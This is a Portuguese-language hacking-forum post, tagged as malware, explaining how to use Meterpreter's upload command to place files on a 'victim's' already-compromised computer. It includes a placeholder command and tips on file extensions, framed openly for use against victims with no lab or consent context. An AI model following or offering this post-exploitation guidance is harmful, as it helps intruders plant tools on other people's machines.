Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

Entre para seguir isso  
Seguidores 0
tomz

[MALWARE]
Como upar programas no computador da Vítima com meterpreter

1 post neste tópico

Salve, 

Vou ensinar como UPAR programas usando o Meterpreter já no computador da Vítima. É uma coisa bem simples, mas requer um pouco de atenção, explicarei.

Já no computador da Vítima com o MSFCONSOLE você vai digitar o seguinte comando: upload /root/Desktop/Nome_Do_Arquivo C:\Local_onde_quer_colocar

tumblr_oiqmc9Z7zn1runbmbo1_1280.jpg

Explicando

A primeira parte do comando citado acima (upload /root/Desktop/Nome_Do_Arquivo) irá pegar certo arquivo de certo local do seu Kali, no meu caso foi do Desktop e o arquivo foi um script em perl.

A segunda parte do comando (C:\Local_onde_quer_colocar) é o local que você escolhe pra colocar o arquivo, no meu caso eu coloquei em uma pasta no Desktop.

LEMBRE-SE: O nome do arquivo depois da barra ( / ) Tem que ser o mesmo para facilitar você a upar, no caso, se um arquivo for .exe (Executável) e mandar pro computador da Vítima como .bat vai danificar o arquivo.

É isso aê, podem mandar pm se precisarem de ajuda com algo !

Tomz

0

Compartilhar este post

Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  
Seguidores 0

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.